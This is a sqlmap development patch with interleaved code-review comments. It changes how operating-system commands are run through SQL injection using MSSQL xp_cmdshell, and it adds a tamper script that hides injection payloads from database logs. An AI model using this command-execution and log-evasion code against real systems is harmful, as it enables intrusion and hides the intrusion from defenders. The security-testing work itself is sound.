From 982fcde1c0fd5c518796dfde5268f356aaf3aae6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Fri, 6 Jul 2012 12:24:55 +0200
Subject: [PATCH] Fix for Issue #62

---
 lib/core/bigarray.py        |  8 ++++++++
 lib/takeover/xp_cmdshell.py | 23 +++++------------------
 tamper/sp_password.py       | 33 +++++++++++++++++++++++++++++++++
 3 files changed, 46 insertions(+), 18 deletions(-)
 create mode 100644 tamper/sp_password.py

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 19f9e91fc..05a5d04a0 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -69,6 +69,14 @@ class BigArray(list):
             with open(self.chunks[index], "rb") as fp:
                 self.cache = Cache(index, pickle.load(fp), False)
 
+    def __getslice__(self, i, j):
+        retval = BigArray()
+        i = max(0, len(self) + i if i < 0 else i)
+        j = min(len(self), len(self) + j if j < 0 else j)
+        for _ in xrange(i, j):
+            retval.append(self[_])
+        return retval
+
     def __getitem__(self, y):
         index = y / BIGARRAY_CHUNK_LENGTH
         offset = y % BIGARRAY_CHUNK_LENGTH
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 9c80d7f3d..3f72d18b9 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -9,6 +9,7 @@ from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
+from lib.core.common import isListLike
 from lib.core.common import isNoneValue
 from lib.core.common import pushValue
 from lib.core.common import popValue
@@ -154,8 +155,6 @@ class xp_cmdshell:
         return inject.goStacked(cmd, silent)
 
     def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
-        self.getRemoteTempPath()
-
         if conf.direct:
             output = self.xpCmdshellExecCmd(cmd)
 
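Review bot: The negative-bound handling in `__getslice__` adjusts twice: under Python 2 the interpreter already adds `len(self)` to a negative slice bound before calling `__getslice__` on a type that has `__len__` (BigArray subclasses `list`), so the `len(self) + i if i < 0` branches only fire for bounds below `-len(self)` and then push them the wrong way — on a 10-element array `arr[-15:]` arrives as `i == -5`, becomes `5`, and yields the last five elements where a plain `list` yields all ten. Clamping alone is correct here: `i = max(0, i)` and `j = min(len(self), j)` (an empty `xrange` already covers `j < i`). Extended slices such as `arr[::2]` bypass `__getslice__` and reach `__getitem__`, whose visible first line `index = y / BIGARRAY_CHUNK_LENGTH` cannot take a `slice` object; checking `isinstance(y, slice)` there and iterating `xrange(*y.indices(len(self)))` would cover that case too and would not depend on the deprecated `__getslice__` hook. `__getitem__` continues past the end of the hunk.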
@@ -170,23 +169,11 @@ class xp_cmdshell:
 
                 output = new_output
         else:
-            tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-            cmd = "%s > \"%s\"" % (cmd, tmpFile)
-
-            self.xpCmdshellExecCmd(cmd)
-
-            inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
-
-            self.delRemoteFile(tmpFile)
-
-            output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
+            inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
+            output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
             inject.goStacked("DELETE FROM %s" % self.cmdTblName)
-
-            if output and isinstance(output, (list, tuple)):
-                output = output[0]
-
-            if output and isinstance(output, (list, tuple)):
-                output = output[0]
+            if output and isListLike(output):
+                output = output[1:]
 
         return output
 
diff --git a/tamper/sp_password.py b/tamper/sp_password.py
new file mode 100644
index 000000000..4ee9eba06
--- /dev/null
+++ b/tamper/sp_password.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGH
+
+def tamper(payload):
+    """
+    Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
+
+    Example:
+        * Input: 1 AND 9227=9227--
+        * Output: 1 AND 9227=9227--sp_password
+
+    Requirement:
+        * MSSQL
+
+    Notes:
+        * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
+        * Reference: http://websec.ca/kb/sql_injection
+    """
+
+    retVal = ""
+
+    if payload:
+        retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
+
+    return retVal
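Review bot: The new `inject.getValue(...)` call drops `firstChar=first, lastChar=last`, yet `xpCmdshellEvalCmd` (signature in the previous hunk) still accepts `first` and `last`, so in the stacked branch those arguments are now silently ignored and nothing visible in the `conf.direct` branch uses them either; either forward them again (`resumeValue=False, firstChar=first, lastChar=last`) or remove the two parameters and update the callers. `output = output[1:]` discards the first row of the result set without saying which row that is or why, so a one-line comment above it, e.g. `# skip the first row of the EXEC result set (<reason>)`, would stop the next maintainer from reading it as an off-by-one. The enclosing `if conf.direct:` and the method body start outside the hunk.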
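Review bot: The docstring example does not match the code beneath it: the membership test looks for `"-- "` with a trailing space, so whether or not the example input `1 AND 9227=9227--` ends in a space (not recoverable from this rendering), the function returns either `1 AND 9227=9227-- sp_password` or `1 AND 9227=9227---- sp_password`, never the `1 AND 9227=9227--sp_password` the `* Output:` line states; the example or the test should be corrected so the two agree. The generator `any(_ if _ in payload else None for _ in ('#', "-- "))` is a roundabout spelling of `any(_ in payload for _ in ('#', "-- "))` and only works because `None` happens to be falsy.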